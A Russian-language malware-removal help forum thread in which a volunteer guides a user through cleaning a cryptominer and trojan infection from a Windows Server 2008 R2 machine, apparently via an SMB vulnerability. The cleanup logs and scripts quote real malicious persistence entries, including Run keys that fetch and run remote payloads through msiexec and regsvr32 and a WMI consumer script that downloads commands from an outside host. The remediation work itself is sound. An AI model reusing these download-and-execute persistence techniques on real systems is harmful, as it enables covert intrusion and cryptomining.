Обнаружена критическая неполадка [UDS:DangerousObject.Multi.Generic]

**terehovskiy** · 03-26-2019, 12:03 AM

Появилась ошибка (возникает каждый раз при загрузке системы, но может появится и через некоторое время работы) windows server 2008 r2, "Обнаружена критическая неполадка, система будет автоматически перезагружена через одну минуту. Сохраните работу сейчас". Для начала лечил с загрузочного диска Dr.Web CureIt, но после лечения примерно через сутки, ошибка вернулась и система перезагрузилась. Далее в ход пошли загрузочные диски Касперского и NOD, но проблема осталась, хотя в данный момент все работает, но на долго ли. Буду признателен в помощи решения данной проблемы.

Забыл добавить.
В журнале windows, есть ошибка в журнале приложений "Критический системный процесс C:\Windows\system32\lsm.exe завершился ошибкой с кодом состояния 1. Система будет перезагружена". Делал sfc /scannow и получал ошибку "Защита ресурсов Windows не может выполнить запрошенную операцию.". После зашел в безопасный режим без загрузки сети и выполнил sfc /scannow при этом предупреждения с перезагрузкой системы не было, скан выполнился и ошибок не было. Загрузился с поддержкой сети и получал предупреждение о том, что система будет перезагружена.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 03-26-2019, 12:04 AM

Уважаемый(ая) terehovskiy, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 03-26-2019, 07:02 AM

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:

Code:

F2 - HKCU\..\WinLogon: [Shell] = explorer.exe, C:\Users\Администратор\AppData\Roaming\dhelper.exe
F2 - HKU\.DEFAULT\..\WinLogon: [Shell] = explorer.exe, C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe
O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q
O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll
O4 - MSConfig\startupfolder: C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^explorer.lnk [backup] => C:\Users\Администратор\AppData\Roaming\TempoR\DOC001.exe (2019/03/24)
O4 - User Startup: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk    ->    C:\Users\Администратор\AppData\Roaming\TempoR\DOC001.exe
O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Microsoft LocalManager[Windows Server 2008 R2 Enterprise] - C:\ProgramData\{88748799-8874-8874-887487997161}\lsm.exe
O23 - Service S2: Microsoft Security Center (2.0) Service - (mssecsvc2.0) - C:\WINDOWS\mssecsvc.exe -m security (file missing)
O23 - Service S2: Microsoft Security Center (2.1) Service - (mssecsvc2.1) - C:\WINDOWS\mssecsvr.exe -m security (file missing)
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)

Выполните скрипт в AVZ:

Code:

begin
 TerminateProcessByName('c:\users\836d~1\appdata\local\temp\2\buff2.exe');
 TerminateProcessByName('c:\users\Администратор\appdata\roaming\dhelper.exe');
 TerminateProcessByName('c:\users\Администратор\appdata\roaming\tempor\doc001.exe');
 TerminateProcessByName('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe');
 QuarantineFile('C:\ProgramData\{88748799-8874-8874-887487997161}\lsm.exe', '');
 QuarantineFile('c:\users\836d~1\appdata\local\temp\2\buff2.exe', '');
 QuarantineFile('C:\Users\836D~1\AppData\Roaming\TempoR\DOC001.exe', '');
 QuarantineFile('c:\users\Администратор\appdata\roaming\dhelper.exe', '');
 QuarantineFile('c:\users\Администратор\appdata\roaming\tempor\doc001.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe', '');
 QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
 QuarantineFile('C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe', '');
 QuarantineFileF('c:\programdata\{88748799-8874-8874-887487997161}', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
 DeleteFile('C:\ProgramData\{88748799-8874-8874-887487997161}\lsm.exe', '64');
 DeleteFile('c:\users\836d~1\appdata\local\temp\2\buff2.exe', '');
 DeleteFile('c:\users\836d~1\appdata\local\temp\2\buff2.exe', '64');
 DeleteFile('C:\Users\836D~1\AppData\Roaming\TempoR\DOC001.exe', '64');
 DeleteFile('c:\users\Администратор\appdata\roaming\dhelper.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\dhelper.exe', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\dhelper.exe', '64');
 DeleteFile('c:\users\Администратор\appdata\roaming\tempor\doc001.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\TempoR\DOC001.exe', '64');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe', '64');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '64');
 DeleteFile('C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe', '32');
 DeleteFile('C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe', '64');
 DeleteService('mssecsvc2.0');
 DeleteFileMask('c:\programdata\{88748799-8874-8874-887487997161}', '*', true);
 DeleteFileMask('c:\users\администратор\appdata\roaming\tempor', '*', true);
 DeleteDirectory('c:\programdata\{88748799-8874-8874-887487997161}');
 DeleteDirectory('c:\users\администратор\appdata\roaming\tempor');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^explorer.lnk', 'command', '64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1', '64');
 DeleteSchedulerTask('Microsoft LocalManager[Windows Server 2008 R2 Enterprise]');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 3, 3, true);
end.

Перезагрузите компьютер вручную.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**terehovskiy** · 03-26-2019, 11:22 AM

Карантин закачал, отчет Farbat прикреплен к сообщению.

**Vvvyg** · 03-26-2019, 01:23 PM

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Code:

HKU\S-1-5-21-2162965194-4131769982-3901334038-500\...\Run: [] => [X]
2019-03-26 05:29 - 2019-03-25 16:24 - 001815801 _____ C:\DOC001.exe
Folder: C:\ProgramData\{79763631-7976-7976-797636311134}
Folder: C:\Adobe
CMD: Type C:\Users\Администратор\AppData\Roaming\temp.bat
CMD: Type C:\Users\Администратор\AppData\Roaming\offline.txt
2019-03-26 05:29 - 2019-03-26 05:29 - 000000000 __SHD C:\ProgramData\{79763631-7976-7976-797636311134}
2019-03-26 04:49 - 2019-03-26 11:05 - 000000000 __SHD C:\ProgramData\{71338236-7133-7133-713382363282}
2019-03-26 04:48 - 2019-03-26 04:48 - 000000000 __SHD C:\ProgramData\{49266261-4926-4926-492662617672}
2019-03-26 02:24 - 2019-03-26 02:24 - 000000000 __SHD C:\ProgramData\{46500021-4650-4650-465000213155}
2019-03-25 20:25 - 2019-03-25 20:25 - 000000000 __SHD C:\ProgramData\{98921577-9892-9892-989215774874}
2019-03-25 20:20 - 2019-03-25 20:20 - 000000000 __SHD C:\ProgramData\{66815628-6681-6681-668156281152}
2019-03-25 18:37 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{59138615-5913-5913-591386157295}
2019-03-25 18:37 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{40865857-4086-4086-408658571581}
2019-03-25 16:40 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{98496839-9849-9849-984968399042}
2019-03-25 16:24 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{90746615-9074-9074-907466156846}
2019-03-25 16:24 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{79172239-7917-7917-791722399387}
2019-03-25 15:15 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{16615732-1661-1661-166157328531}
2019-03-09 07:23 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{22312142-2231-2231-223121427199}
2019-03-09 04:23 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{94501177-9450-9450-945011774394}
2019-03-09 04:22 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{61873280-6187-6187-618732807155}
2019-03-09 04:19 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{30504801-3050-3050-305048017986}
2019-03-09 04:19 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{22067586-2206-2206-220675864869}
2019-02-26 05:58 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{38040600-3804-3804-380406004380}
2019-02-26 03:04 - 2019-03-26 00:04 - 000000026 _____ C:\Users\Администратор\AppData\Roaming\temp.bat
2019-02-26 02:56 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{10205068-1020-1020-102050689947}
2019-02-26 02:54 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{88314851-8831-8831-883148514966}
2019-02-25 17:21 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{69857680-6985-6985-698576801056}
2019-02-25 14:17 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{74130130-7413-7413-741301309946}
2019-02-25 14:17 - 2019-03-24 21:06 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\Tempo
2019-02-25 14:17 - 2017-06-04 20:01 - 000000000 __RSH C:\Users\Администратор\AppData\Roaming\cppredistx86.exe
2019-02-25 12:33 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{79009396-7900-7900-790093963383}
2018-03-17 01:49 - 2019-03-24 04:55 - 000000087 _____ () C:\Program Files\Common Files\xp.dat
2018-09-13 12:32 - 2018-09-27 01:15 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
Task: {0CD94DF2-AF93-481C-8C15-62308D50B606} - \Mysa2 -> No File <==== ATTENTION
Task: {16920345-F4E4-4BF7-A7A4-003FADF2FA1F} - \Mysa1 -> No File <==== ATTENTION
Task: {35BE678B-CAD4-4E8E-A9E6-7F5FC70478BD} - \ok -> No File <==== ATTENTION
Task: {5AC0E213-52C3-4D11-AB18-58470AFB0DF9} - \Mysa3 -> No File <==== ATTENTION
Task: {6CC622DF-AB17-47A7-A8C8-6E235D03B902} - \Mysa -> No File <==== ATTENTION
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Закройте все программы, отключите пользователей, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Перезагрузите сервер.

Скорее всего зловреды лезут через незакрытую уязвимость.

Выполните скрипт в AVZ при наличии доступа в интернет:

Code:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt

**terehovskiy** · 03-26-2019, 03:41 PM

Fixlog прикрепил. Найдено 5 уязвимостей после выполнения скрипта. Их установить как я понял? Кстати появился еще один пользователь при входе admin$.

**Vvvyg** · 03-26-2019, 05:03 PM

Устраняйте обязательно, долбят наверняка через закрытую ещё в апреле 2017-го года уязвимость.
Удаляйте лишних пользователей, меняйте пароли.

**terehovskiy** · 03-26-2019, 05:26 PM

Какие дальше мои действия? Обновления установил. Пользователя удалил. Доступ к рдп ограничен по ИП через брендмауэр.

**Vvvyg** · 03-26-2019, 06:06 PM

Понаблюдайте день хотя бы, если рецидива не будет - всё в порядке.

**terehovskiy** · 03-27-2019, 05:56 PM

Пока предыдущая проблема не возникала, но появились новые. Увидел, что в брендмауэре создается правило "tcp all" которое открывает все действующие порты, если его удалить, оно снова появляется.
Также стала падать служба mssql сервер 2008 с логом 7034, полагаю это из-за вируса, т.к. роняет ее "Microsoft Security Center (2.1) Service". При этом в логах есть запись "Сбой при запуске службы "Microsoft Security Center (2.1) Service" из-за ошибки. Не удается найти указанный файл.". Службу отключал, но mssql сервер все равно падает. Думал, что проблема в самом sql из-за обновления винды, но в итоге пришел к тому, что у меня последний пакет обновлений для mssql сервер. Хочется окончательно избавится от вирусов.

- - - - -Добавлено - - - - -

Сейчас заметил, что он пытается запустить 2 службы MSC, "Сбой при запуске службы "Microsoft Security Center (2.0) Service" из-за ошибки. Не удается найти указанный файл." и такую же службу версии 2.1. Хотя по сути, служба запущена и ее видно в службах.

**Vvvyg** · 03-27-2019, 08:54 PM

Левые задания в MS SQL Server есть?

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

**terehovskiy** · 03-28-2019, 04:49 PM

Файл прикрепил. Кстати, я совсем забыл сказать, что стоит программный рейд диска C. Возможно вирусы лезут со второго диска?

**Vvvyg** · 03-28-2019, 09:04 PM

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):

Code:

;uVS v4.1.3 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
delref %Sys32%\DRIVERS\18D89FC586.SYS
delref HTTP://JS.1226BYE.XYZ:280/V.SCT
zoo %SystemRoot%\SYSTEM\MSINFO.EXE
addsgn 9A79B350438226EC0AD4EC449312FB4DA34303A78661DA9170F7C2BC632486890949A66505AA1CAFD480849FB3EFC2CEC87B13B65522D617E8B64E2746FA8C56 8 Win32/Agent.WTF [ESET-NOD32] 7

chklst
delvir

deltsk %SystemRoot%\SYSTEM\MY1.BAT
delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\GOOGLE\UPDATE\1.3.33.23\GOOGLEUPDATEONDEMAND.EXE
regt 25
apply

deltmp
czoo

Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Перезагрузите сервер.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**terehovskiy** · 03-29-2019, 03:12 AM

Архив загрузил, логи во вложении.

**Vvvyg** · 03-29-2019, 06:55 AM

Уязвимости точно все устранили? Свежие майнеры и трояны снова.

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Code:

HKLM-x32\...\Run: [] => [X]
S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
Virustotal: C:\Windows\SysWOW64\csrs.exe
2019-03-28 22:24 - 2019-03-28 22:24 - 006466961 _____ (Microsoft Corporation) C:\Windows\SysWOW64\csrs.exe
Folder: C:\Windows\CheckSur
Folder: C:\Program Files\shengda
Folder: C:\Program Files\kugou2010
C:\Windows\SysWOW64\*.dmp
2019-03-26 19:25 - 2019-03-28 16:24 - 000000084 _____ C:\Program Files\Common Files\xpwpd.dat
2019-03-26 19:25 - 2019-03-28 16:18 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Drivers\64.exe
2019-03-26 19:25 - 2019-03-28 16:17 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe
2019-03-26 19:25 - 2019-03-28 16:16 - 000008702 _____ C:\Windows\system32\c.txt
2019-03-26 22:26 - 2019-03-28 07:13 - 000000080 _____ C:\Windows\system32\s
2019-03-26 22:26 - 2019-03-28 07:13 - 000000078 _____ C:\Windows\system32\ps
2019-03-26 22:26 - 2019-03-28 07:13 - 000000076 _____ C:\Windows\system32\p
2019-03-26 19:25 - 2019-03-26 19:25 - 000000000 __SHD C:\Program Files\shengda
2019-03-26 19:25 - 2019-03-26 19:25 - 000000000 __SHD C:\Program Files\kugou2010
2019-03-26 19:24 - 2019-03-28 16:15 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2019-03-26 14:21 - 2018-02-02 12:16 - 584878796 _____ C:\Windows\MEMORY.DMP
2019-03-26 04:49 - 2019-02-25 14:17 - 000002400 _____ C:\Users\Администратор\AppData\Roaming\offline.txt
Task: {64FBD7D5-8E3C-4535-80B4-1322EFC6CC91} - \ok -> No File <==== ATTENTION
Task: {E3154922-CE27-4925-A98A-D95128C3C300} - \Mysa1 -> No File <==== ATTENTION
FirewallRules: [{F9483CF5-FDA9-46B6-8538-3B01B071C81B}] => (Block) LPort=445
FirewallRules: [{64923BA9-1871-4C1B-8078-7C3D06494DC7}] => (Block) LPort=139

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки всех пользователей, закройте все программы, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

**terehovskiy** · 03-30-2019, 03:40 AM

Да, уязвимости устранил. Перепроверял после установки заплаток.

**Vvvyg** · 03-30-2019, 11:08 AM

Похоже, источник заражения на одном из компьютеров в сети.

Сделайте лог сканирования Мalwarebytes.

**terehovskiy** · 03-31-2019, 02:07 AM

Зная нашего брата, вероятность того, что в сети есть такой компьютер 99%.

**Vvvyg** · 03-31-2019, 10:48 AM

Поправьте настройки DNS: 223.5.5.5 - 8.8.8.8
Первый замените на провайдерский или 8.8.4.4.

Проверьте сеть через ETERNAL BLUES, уязвимые компьютеры проверяйте в первую очередь.

**terehovskiy** · 04-03-2019, 03:18 AM

Этот софт ищет компьютеры с уязвимостями в сети? Сеть ДЦ. Есть смысл мне или нет?

Обнаружена критическая неполадка [UDS:DangerousObject.Multi.Generic] (заявка № 222367)

Thread Tools